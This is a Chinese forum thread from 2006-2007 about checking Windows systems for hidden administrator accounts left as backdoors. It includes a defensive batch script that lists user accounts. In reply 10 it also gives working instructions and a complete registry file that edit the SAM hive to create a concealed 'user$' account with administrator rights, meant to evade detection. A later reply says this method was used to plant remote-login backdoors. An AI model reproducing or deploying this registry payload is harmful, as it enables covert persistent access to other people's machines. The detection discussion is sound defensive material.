无忧启动论坛

 找回密码
 注册
搜索
系统gho:最纯净好用系统下载站投放广告、加入VIP会员,请联系 微信:wuyouceo
查看: 6564|回复: 28
打印 上一主题 下一主题

检查你的系统有没有隐藏的管理员

[复制链接]
跳转到指定楼层
1#
发表于 2006-11-25 12:17:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
许多朋友安装的都是网上下载的系统,很有可能他里面有别人留下的隐藏的超级管理员账号作为入侵的后门,让我们快快检查一下,保证自己安全

隐藏管理员账号检测软件.part1.rar

97.66 KB, 下载次数: 396, 下载积分: 无忧币 -2

隐藏管理员账号检测软件.part2.rar

97.66 KB, 下载次数: 376, 下载积分: 无忧币 -2

隐藏管理员账号检测软件.part3.rar

97.66 KB, 下载次数: 368, 下载积分: 无忧币 -2

隐藏管理员账号检测软件.part4.rar

5.98 KB, 下载次数: 308, 下载积分: 无忧币 -2

2#
发表于 2006-11-25 12:23:21 | 只看该作者
下一个看下自己的系统先
回复

使用道具 举报

3#
发表于 2006-11-25 13:28:10 | 只看该作者
  CMD命令行下,用 net user 也可以查看的。如果要查找更详细的信息,可以用如下DOS批处理代码来实现:

  1. @echo off
  2. cd.>netuser.txt
  3. for /f "skip=4 tokens=1-3" %%i in ('net user') do (
  4.     if not "%%i"=="命令成功完成。" net use %%i>>netuser.txt 2>nul
  5.     if not "%%j"=="" net user %%j>>netuser.txt 2>nul
  6.     if not "%%k"=="" net user %%k>>netuser.txt 2>nul
  7. )
  8. start netuser.txt
复制代码
回复

使用道具 举报

4#
发表于 2006-11-28 00:21:52 | 只看该作者
楼上兄弟的批处理写得确实可以,很方便的。
回复

使用道具 举报

5#
发表于 2006-11-28 00:38:54 | 只看该作者
  3F的代码其实只是把所有的用户罗列了出来,没有排版区分管理员和非管理员,需要根据netuser.txt的描述来判断,还是有所不便。不过这个功能是可以做到的。
回复

使用道具 举报

6#
发表于 2006-11-28 02:07:48 | 只看该作者
图形界面的方法有吗?
回复

使用道具 举报

7#
发表于 2006-11-28 09:37:21 | 只看该作者
下一个看下自己的
回复

使用道具 举报

8#
发表于 2006-11-28 11:57:29 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

9#
发表于 2006-11-30 13:20:53 | 只看该作者
楼上的简单!!
回复

使用道具 举报

10#
发表于 2006-11-30 13:39:35 | 只看该作者
用regedt32修改HKEY_LOCAL_MACHINE\SAM\SAM的权限
导入以下注册表文件,可建立一个administrator权限的user$账户
密码(就不说了),用以上方法只有8f的方法看到

再将HKEY_LOCAL_MACHINE\SAM\SAM的权限改回


  1. Windows Registry Editor Version 5.00

  2. [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\user$]
  3. @=hex(3f0):

  4. [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F0]
  5. "F"=hex:02,00,01,00,00,00,00,00,9e,ef,02,c9,38,0e,c7,01,00,00,00,00,00,00,00,\
  6.   00,e2,09,31,08,37,12,c7,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  7.   f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,\
  8.   00,00,00,00,00,00,00
  9. "V"=hex:00,00,00,00,bc,00,00,00,02,00,01,00,bc,00,00,00,1a,00,00,00,00,00,00,\
  10.   00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,00,00,1a,00,00,00,00,00,00,00,\
  11.   f4,00,00,00,00,00,00,00,00,00,00,00,f4,00,00,00,00,00,00,00,00,00,00,00,f4,\
  12.   00,00,00,00,00,00,00,00,00,00,00,f4,00,00,00,00,00,00,00,00,00,00,00,f4,00,\
  13.   00,00,00,00,00,00,00,00,00,00,f4,00,00,00,00,00,00,00,00,00,00,00,f4,00,00,\
  14.   00,00,00,00,00,00,00,00,00,f4,00,00,00,15,00,00,00,a8,00,00,00,0c,01,00,00,\
  15.   08,00,00,00,01,00,00,00,14,01,00,00,14,00,00,00,00,00,00,00,28,01,00,00,14,\
  16.   00,00,00,00,00,00,00,3c,01,00,00,04,00,00,00,00,00,00,00,40,01,00,00,04,00,\
  17.   00,00,00,00,00,00,01,00,14,80,9c,00,00,00,ac,00,00,00,14,00,00,00,44,00,00,\
  18.   00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\
  19.   00,00,00,00,02,c0,14,00,ff,ff,1f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\
  20.   00,58,00,03,00,00,00,00,00,14,00,5b,03,02,00,01,01,00,00,00,00,00,01,00,00,\
  21.   00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\
  22.   00,00,00,24,00,44,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,52,aa,c8,68,\
  23.   b4,7b,73,34,07,e5,3b,2b,f4,01,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,\
  24.   02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,41,00,64,00,6d,00,\
  25.   69,00,6e,00,69,00,73,00,74,00,72,00,61,00,74,00,6f,00,72,00,00,00,a1,7b,06,\
  26.   74,a1,8b,97,7b,3a,67,28,00,df,57,29,00,84,76,85,51,6e,7f,10,5e,37,62,00,00,\
  27.   ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,90,1d,78,01,\
  28.   02,00,00,07,00,00,00,01,00,01,00,a7,67,58,96,30,a1,6e,85,59,66,b1,f9,ba,b2,\
  29.   24,81,01,00,01,00,17,c4,df,b8,02,d9,31,e3,9e,71,6a,cf,2b,42,0d,b2,01,00,01,\
  30.   00,01,00,01,00

复制代码

[ 本帖最后由 沙漠之子 于 2006-11-30 01:42 PM 编辑 ]
回复

使用道具 举报

11#
发表于 2006-11-30 13:51:07 | 只看该作者
不知有没有更隐蔽的方法呢
回复

使用道具 举报

12#
发表于 2006-11-30 19:10:09 | 只看该作者
谢谢楼主分享,收藏了
回复

使用道具 举报

13#
发表于 2006-12-2 20:25:36 | 只看该作者
支持一下,好东西。
回复

使用道具 举报

14#
发表于 2006-12-7 21:44:29 | 只看该作者
很不错的东东,
回复

使用道具 举报

15#
发表于 2006-12-11 11:50:15 | 只看该作者
呵呵,呵呵
回复

使用道具 举报

16#
发表于 2006-12-11 17:26:47 | 只看该作者
下载一个查查看偶个系统有没有隐藏的管理员帐号
回复

使用道具 举报

17#
发表于 2006-12-12 17:34:30 | 只看该作者
下一个看下自己的系统,谢谢.
回复

使用道具 举报

18#
发表于 2006-12-12 18:17:47 | 只看该作者
看来方法着不少 检查了一下我的没有
回复

使用道具 举报

19#
发表于 2006-12-30 15:22:24 | 只看该作者
长见识了
回复

使用道具 举报

20#
发表于 2006-12-30 18:44:38 | 只看该作者
很实用啊~!谢谢!
回复

使用道具 举报

21#
发表于 2007-1-4 15:20:42 | 只看该作者
谢谢楼主分享
回复

使用道具 举报

22#
发表于 2007-1-14 16:13:32 | 只看该作者
谢谢分享,辛苦了你.
回复

使用道具 举报

23#
发表于 2007-1-14 17:34:37 | 只看该作者
10楼的可是经典的克隆管理员账号啊,记得在2000年学习hack的时候经常用这种方法远程登录克隆建后门
回复

使用道具 举报

24#
发表于 2007-1-14 17:44:50 | 只看该作者
呵呵,对新人有帮助的
回复

使用道具 举报

25#
发表于 2007-1-19 15:40:23 | 只看该作者
收藏了
回复

使用道具 举报

26#
发表于 2007-1-19 21:04:14 | 只看该作者
收下了,谢谢!
回复

使用道具 举报

27#
发表于 2007-1-20 11:00:13 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

28#
发表于 2007-1-20 13:01:04 | 只看该作者
这个难道杀毒软件查不出来吗?
回复

使用道具 举报

29#
发表于 2007-1-20 15:07:39 | 只看该作者
谢谢楼主!下载收藏
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|Archiver|捐助支持|无忧启动 ( 闽ICP备05002490号-1 )

闽公网安备 35020302032614号

GMT+8, 2026-1-15 23:33

Powered by Discuz! X3.3

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表